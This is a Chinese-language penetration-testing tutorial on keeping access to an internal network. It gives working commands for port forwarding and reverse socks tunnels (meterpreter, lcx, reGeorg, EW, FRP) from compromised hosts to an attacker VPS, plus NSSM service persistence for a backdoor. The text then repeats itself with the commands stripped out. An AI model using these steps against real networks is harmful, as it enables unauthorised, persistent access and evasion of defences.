内网渗透经验(代理篇)
字数 1041 2025-08-18 11:38:48

内网渗透代理技术详解

前言

在内网渗透过程中,会话维持是至关重要的环节。过度依赖单一入口点(如web服务)会导致一旦服务关闭就失去访问权限。本文将详细介绍几种常用的内网代理技术,帮助建立稳定的内网访问通道。

1. MSF端口转发

使用条件

  • 目标服务器能够访问外网
  • 攻击者拥有公网IP

操作步骤

  1. 使用meterpreter的portfwd命令进行端口转发:
portfwd add -l 5555 -p 3389 -r 172.16.86.153

将目标主机的3389(RDP)端口转发到本地5555端口

  1. 使用rdesktop连接本地转发的端口:
rdesktop 127.1.1.0:8888

注意事项

  • MSF内置的socks模块速度和稳定性较差,不推荐使用

2. LCX/Portmap工具

使用条件

  • 目标服务器能够访问外网
  • 攻击者拥有公网IP

Windows端操作

上传lcx.exe并执行:

lcx.exe -slave 1.1.1.1 9999 127.0.0.1 3389

将本地3389端口转发到公网VPS的9999端口

Linux端操作

使用portmap监听:

./portmap -m 2 -p1 9999 -p2 33889

将9999端口接收的数据转发到33889端口

连接方式

直接使用远程桌面连接VPS的33889端口

3. 基于Web的Socks5隧道

适用场景

  • 内网服务器不通外网的情况

常用工具

  • reGeorg
  • reDuh
  • Tunna
  • Proxifier

reGeorg使用步骤

  1. 上传对应脚本的tunnel文件到web服务器
  2. 访问上传文件确认成功
  3. 本地执行代理脚本:
python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php
  1. 配置Proxifier使用指定的8888端口

注意事项

  • 可能被防护设备检测到异常流量,可尝试reDuh替代

4. EW工具搭建Socks5隧道

使用条件

  • 目标主机能访问外网
  • 拥有公网IP

操作步骤

  1. 在VPS上执行:
./ew_for_linux64 -s rcsocks -l 10000 -e 11000

-l: Proxifier连接端口
-e: 通信端口

  1. 在目标主机执行:
ew_for_Win.exe -s rssocks -d 1.1.1.1 -e 11000
  1. 配置Proxifier连接VPS的10000端口

5. FRP内网穿透

使用条件

  • 目标主机能访问外网
  • 拥有公网IP

配置步骤

  1. 服务端配置frps.ini

  2. 客户端配置frpc.ini:

[socks5_proxy]
type = tcp
remote_port = 11000
plugin = socks5
plugin_user = xxx
plugin_passwd = xxx
  1. 上传并运行客户端:
frpc.exe -c 文件路径
  1. 配置Proxifier连接并验证

多主机配置

  • 修改frpc.ini中的名称和端口号避免冲突

清理

tasklist
taskkill /pid 进程号 -t -f

6. 后门持久化

NSSM服务封装

  1. 安装服务:
nssm install name
  1. 选择要封装的exe文件
  2. 设置服务名称并安装
  3. 检查服务状态确保自动启动

删除服务

nssm remove <servicename>

总结

工具推荐:

  • MSF:功能全面但socks性能差
  • LCX/Portmap:简单端口转发
  • reGeorg:无外网连接时的Web隧道
  • EW:稳定socks5隧道
  • FRP:功能强大支持认证

选择自己顺手的工具组合使用,关键是要理解各种技术的适用场景和原理。

内网渗透代理技术详解 前言 在内网渗透过程中,会话维持是至关重要的环节。过度依赖单一入口点(如web服务)会导致一旦服务关闭就失去访问权限。本文将详细介绍几种常用的内网代理技术,帮助建立稳定的内网访问通道。 1. MSF端口转发 使用条件 目标服务器能够访问外网 攻击者拥有公网IP 操作步骤 使用meterpreter的portfwd命令进行端口转发: 将目标主机的3389(RDP)端口转发到本地5555端口 使用rdesktop连接本地转发的端口: 注意事项 MSF内置的socks模块速度和稳定性较差,不推荐使用 2. LCX/Portmap工具 使用条件 目标服务器能够访问外网 攻击者拥有公网IP Windows端操作 上传lcx.exe并执行: 将本地3389端口转发到公网VPS的9999端口 Linux端操作 使用portmap监听: 将9999端口接收的数据转发到33889端口 连接方式 直接使用远程桌面连接VPS的33889端口 3. 基于Web的Socks5隧道 适用场景 内网服务器不通外网的情况 常用工具 reGeorg reDuh Tunna Proxifier reGeorg使用步骤 上传对应脚本的tunnel文件到web服务器 访问上传文件确认成功 本地执行代理脚本: 配置Proxifier使用指定的8888端口 注意事项 可能被防护设备检测到异常流量,可尝试reDuh替代 4. EW工具搭建Socks5隧道 使用条件 目标主机能访问外网 拥有公网IP 操作步骤 在VPS上执行: -l: Proxifier连接端口 -e: 通信端口 在目标主机执行: 配置Proxifier连接VPS的10000端口 5. FRP内网穿透 使用条件 目标主机能访问外网 拥有公网IP 配置步骤 服务端配置frps.ini 客户端配置frpc.ini: 上传并运行客户端: 配置Proxifier连接并验证 多主机配置 修改frpc.ini中的名称和端口号避免冲突 清理 6. 后门持久化 NSSM服务封装 安装服务: 选择要封装的exe文件 设置服务名称并安装 检查服务状态确保自动启动 删除服务 总结 工具推荐: MSF:功能全面但socks性能差 LCX/Portmap:简单端口转发 reGeorg:无外网连接时的Web隧道 EW:稳定socks5隧道 FRP:功能强大支持认证 选择自己顺手的工具组合使用,关键是要理解各种技术的适用场景和原理。